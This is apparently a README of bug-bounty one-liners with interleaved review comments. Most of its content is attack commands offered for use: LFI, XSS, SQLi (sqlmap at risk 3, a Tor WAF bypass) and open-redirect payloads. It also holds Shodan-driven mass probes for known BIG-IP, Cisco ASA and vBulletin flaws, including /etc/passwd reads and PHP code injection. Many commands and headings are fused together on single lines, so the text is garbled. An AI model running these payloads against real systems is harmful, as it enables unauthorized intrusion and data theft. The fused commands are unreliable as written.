A curated list of recon & vulnerability hunting one-liners for bug bounty, pentesting, and automation.
- LFI
- Open Redirect
- SSRF
- XSS
- SQL Injection
- Hidden Directories
- Sensitive Files
- CORS
- Prototype Pollution
- JavaScript Analysis
- SSTI
- Misc
# Several independent one-liners (LFI probe, open-redirect check, SSRF via a collaborator
# host, a KNOXSS submission loop, two XSS pipelines, a Gxss/dalfox pipe, and two SQLi
# checks) were collapsed onto this one physical line, together with the heading text
# ("Loop through potentially vulnriable SQLi file ...", typo included) that introduces the
# loop that follows. Each is a separate command and has to be split back out before use.
# Quoting defects a linter flags: `$line`, `$file`, `$url` and `$i` are expanded unquoted,
# every `read host` / `read line` lacks -r, and `for i in $(cat tmp-sqli.txt)` word-splits
# and glob-expands each line of the file.
# `echo -e "$host \033[0;31mVulnerable\n"` interprets the colour escape, but the later
# `echo "$host \033[0;31mVulnerable"` has no -e, so with bash's default echo it prints the
# escape sequence literally.
# `waybckurls` is a misspelling of `waybackurls` (spelled correctly earlier on this line);
# it is the last alternative in that `||` chain, so the fallback never reaches the tool.
# The KNOXSS loop posts every URL read from $file to https://api.knoxss.pro and passes the
# API key as a curl argument (visible to `ps`); `key="API_KEY"` is a placeholder to fill.
# `sqlmap ... --level 5 --risk 3`: risk 3 enables OR-based tests that can alter data on the
# tested backend — NOTE(review): confirm against the sqlmap --risk documentation.
cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host; do curl -s -L "$host" -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n"; donecat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -frfile=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $filecat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipeecho target.com | (gau || hakrawler || waybackurls || katana) | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31mVulnerable"; donecat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbsfor i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; doneLoop through potentially vulnriable SQLi file and show exploited ones to file
# Re-checks each candidate URL with ghauri and appends the ones whose output contains
# "available databases" to the result file via `anew` (which also dedupes).
# `cat file | while read` is a useless use of cat; `while ... done < file` reads the same
# lines without the extra process. `2>/dev/null` hides ghauri's own errors, so a tool
# failure looks identical to a clean result. The output path
# /root/nucleye/output/confirmed_sqli.txt is hard-coded to the author's machine.
# The heading "WAF Bypass (TOR)" for the next one-liner was fused onto the closing line.
cat maybe_vuln_to_sqli.txt | while read -r url; do
ghauri -u "$url" --batch --dbs 2>/dev/null | grep -qi "available databases" && echo "$url";
done | anew /root/nucleye/output/confirmed_sqli.txtWAF Bypass (TOR)
# sqlmap driven from a saved request file, routed through Tor as SOCKS5 with the
# space2comment tamper script; `--check-tor` verifies that traffic actually leaves via Tor
# before testing starts. The heading "📁 Hidden Directories" is fused onto the line end.
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment📁 Hidden Directories
# Two separate directory brute-force commands (dirsearch, then ffuf) plus the heading
# "Extract URLs from ffuf JSON" are fused onto one line.
# In the ffuf invocation both URL and FUZZ are wordlist keywords (`-w file:KEYWORD`), so
# by default ffuf combines every entry of urls.txt with every entry of wordlist.txt;
# `-mc all -fc 500,502 -ac` keeps every status code except 500/502 and auto-calibrates
# the filters; `-recursion` follows discovered directories; results land in output.json,
# which the next one-liner consumes.
dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -o output.txtffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.jsonExtract URLs from ffuf JSON
# Four one-liners collapsed together: ffuf JSON → URL list, a sensitive-file-extension
# grep, a CORS origin-reflection check, and a prototype-pollution probe via page-fetch;
# the heading "Find JS Files" is fused onto the end.
# `cat output.json | jq | grep -o '"url": ...'` scrapes pretty-printed JSON with a regex;
# ffuf keeps each hit's URL under .results[].url, so `jq -r '.results[].url' output.json`
# is the robust form — NOTE(review): verify against the ffuf version in use.
# In the extension grep the first alternative `.xls` (and the second dot of `\.tar.gz`)
# is an unescaped `.`, so any character followed by "xls" matches.
# The CORS check greps the raw response headers for the reflected origin; a match shows
# the origin echoed back but says nothing about Access-Control-Allow-Credentials.
# `read url` lacks -r. The `sed 's/$/.../'` appends `/?__proto__[testparam]=exploit/` to
# every alive host and page-fetch reports the value of window.testparam after load.
cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txtecho target.com | (gau || hakrawler || waybackurls || katana) | grep -E ".xls|\.xml|\.json|\.pdf|\.sql|\.docx|\.zip|\.tar.gz|\.bak|\.7z|\.rar"echo target.com | (gau || hakrawler || waybackurls || katana) | while read url; do curl -s -I -H "Origin: https://evil.com" "$url" | grep 'https://evil.com' && echo "[VULN] $url"; donesubfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | grep "VULNERABLE"Find JS Files
# Collects JavaScript URLs from the archived/crawled URL set. `grep -i "\.js"` matches any
# ".js" substring and the `egrep -v` only drops .json/.jsp, so ".jsx" or "foo.js.map"
# still pass; `egrep` is deprecated in favour of `grep -E`.
# The heading "Extract Endpoints" is fused onto the line end.
cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i "\.js" | egrep -v "\.json|\.jsp" | anew js.txtExtract Endpoints
# Two separate commands fused with the heading "Shodan Scan": an endpoint extractor for
# main.js (double-quoted, slash-prefixed strings) and a tplmap SSTI loop.
# The regex only admits [a-zA-Z0-9_/?=&], so paths containing '-' or '.' are skipped; the
# two `sed` calls could be a single `sed 's/^"//;s/"$//'`.
# `for url in $(cat targets.txt)` word-splits and glob-expands each line, and `$url` is
# passed to tplmap unquoted.
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed 's/^"//' | sed 's/"$//' | sort -ufor url in $(cat targets.txt); do python3 tplmap.py -u $url; doneShodan Scan
# Submits the IPs in batches of 100 to Shodan's on-demand scanner without waiting for
# results (`--wait 0`); `cat file | xargs` could be `xargs ... < my_ips.txt`.
# The heading "Nuclei Screenshots" is fused onto the line end.
cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0Nuclei Screenshots
# Runs the nuclei headless screenshot template over target.txt (verbose output).
# The heading "Nmap CIDR → IPs" is fused onto the line end.
nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -vNmap CIDR → IPs
# Ping-sweeps each CIDR with nmap and keeps only the host names from the report lines.
# `xargs -I @ sh -c '... @ ...'` substitutes each line of cidr.txt into a string that is
# then parsed as shell code, so a line containing shell metacharacters is executed rather
# than scanned; `xargs -I @ nmap -sn @ | grep ... | sed ...` avoids the intermediate shell.
# The heading "Download JS Files" is fused onto the line end.
cat cidr.txt | xargs -I @ sh -c 'nmap -sn @ | grep "Nmap scan report" | sed "s/Nmap scan report for //g"' | anew nmap-ips.txtDownload JS Files
# From here to the end of the page the one-liners are fused end-to-end: the `done` that
# closes one loop sits on the same physical line as the command that starts the next, and
# the README's closing sentence is attached to the final `httpx`. Each unit is annotated
# in order below.
# First line, three commands: (1) downloads every URL in js.txt into js_files/ named by
# basename — two URLs sharing a basename overwrite each other; (2) a second copy of the
# prototype-pollution probe with HOST/FILE placeholders, `anew -q`, and extra `sed`
# cleanup of page-fetch's output; (3) a Shodan favicon-hash search whose ip:port results
# (built by awk) feed the loop that follows.
mkdir -p js_files; while read -r url; do curl -sSL "$url" -o "js_files/$(basename "$url")"; done < js.txtsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do
# Loop body: fetches one path per host and branches on whether "root" appears in the
# response. `$host` is used as the printf FORMAT string on the next two lines, so a host
# containing '%' is interpreted as a directive; the safe form is
# printf '%s Vulnerable\n' "$host". `read host` above also lacks -r.
curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root &&
printf "$host Vulnerable\n" ||
printf "$host Not Vulnerable\n"
# Next loop: reads hosts from HOSTS.txt (`done < HOSTS.txt` below) and looks for "Cisco"
# in the first lines of the response. `read LINE` lacks -r, and upper-case names are
# conventionally reserved for environment/exported variables.
donewhile read LINE; do
curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" |
head | grep -q "Cisco" &&
echo "[VULNERABLE] $LINE" ||
echo "[NOT VULNERABLE] $LINE"
# Next loop: `cat URLS.txt | while read h` (useless cat, no -r) requests one URL per host
# and reports when the probe string is echoed back in the body.
done < HOSTS.txtcat URLS.txt | while read h; do
curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x" |
grep -qs "onmouse" && echo "$h: VULNERABLE"
# Next loop: a second Shodan favicon-hash search feeding a POST per host and branching on
# "phpinfo" in the response. `http://$host/...` is unquoted; the trailing `\` on the curl
# line is a continuation and must stay immediately before the newline.
doneshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do
curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel \
-d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' |
grep -q phpinfo &&
echo "$host VULNERABLE" ||
echo "$host Not Vulnerable"
# Harvests `var <name>` declarations from every non-asset URL of a host's subdomains.
# `egrep -v '(.css|.png|...)'` uses unescaped dots, so any character followed by "css",
# "png", ... is excluded as well; egrep is deprecated in favour of grep -E.
doneassetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpg|.svg|.gif)' | while read url; do
# `$url` is unquoted here; `read url` above lacks -r.
curl -s $url | grep -Eo "var [a-zA-Z0-9_]+"
# Two more fused commands: the FILE.js endpoint extractor (same character-class limits
# as the main.js variant above) and a nested loop resolving each HOST with `dig a` and
# running whois on every A record. `$HOST` and `$ip` are unquoted and both `$(cat ...)`
# / `$(dig ...)` loops word-split their input.
donecat FILE.js | grep -oh '"/[a-zA-Z0-9_/?=&]*"' | sed 's/"//g' | sort -ufor HOST in $(cat HOSTS.txt); do
for ip in $(dig a $HOST +short); do
whois $ip | grep -e "CIDR\|Organization"
done
# Passive subdomain sources, each a separate command with HOST/domain placeholders:
# rapiddns, dns.bufferover.run (FDNS_A), tls.bufferover.run (Results, last CSV field via
# rev|cut|rev), riddler.io CSV export, the VirusTotal UI endpoint, certspotter issuances,
# and the Wayback CDX index. `export host=...` / `export domain=...` put the target into
# the environment for the curl lines that follow. The hostname regex
# `(([\w.-]*)\.([\w]*)\.([A-z]))\w+` uses [A-z], which in ASCII also spans the
# punctuation between 'Z' and 'a' ([ \ ] ^ _ `).
doneexport host="HOST"
curl -s "https://rapiddns.io/subdomain/$host?full=1" | grep "$host" | sort -ucurl -s https://dns.bufferover.run/dns?q=.HOST | jq -r .FDNS_A[] | cut -d',' -f2 | sort -uexport domain="HOST"
curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results[] | rev | cut -d ',' -f1 | rev | sort -ucurl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -ucurl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -ucurl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" |
jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -ucurl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" |
sed 's_https*://__' | cut -d/ -f1 | sort -uffuf -u https://FUZZ.HOST -w FILE.txt -vgrep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' file.txtsubfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobesubfinder -d HOST >> FILE
# The line above also carries: a vhost fuzz (`ffuf -u https://FUZZ.HOST`), an IPv4 regex
# grep with no octet range check (999.999.999.999 matches), and a
# subfinder → filter-resolved → cf-check → naabu (`-rate 40000`) → httprobe chain.
# The `>> FILE` appends here and below accumulate three tools' output for subjack without
# deduplication (`anew FILE` or a final `sort -u` would dedupe).
assetfinder --subs-only HOST >> FILE
amass enum -d HOST >> FILE
# Three fused commands: subjack over the merged FILE, a sitemap.xml <loc> scrape
# (`grep loc` also matches a "loc" substring on any other line), and a loop that
# re-requests each parameterised Wayback URL with the replaced query value; `read url`
# lacks -r.
subjack -w FILEcurl -s http://HOST/sitemap.xml | grep loc | sed 's/<[^>]*>//g'waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read url; do
curl -sk "$url" | grep alert
# CORS origin-reflection loop over gau output for URL; `$url` is unquoted on the curl
# line and `grep evil.com` matches that substring anywhere in the headers.
donegau URL | while read url; do
curl -sIH "Origin: https://evil.com" $url | grep evil.com
# `nmap -oX -` writes XML, not JSON, so `jq` fails to parse it and httpx receives nothing;
# an XML-to-JSON conversion step is missing — NOTE(review): confirm the intended pipe.
# The trailing sentence is the README's closing note, fused onto the command.
donenmap -oX - HOST | jq | httpxThis is for educational and authorized testing only.
PRs welcome 🔥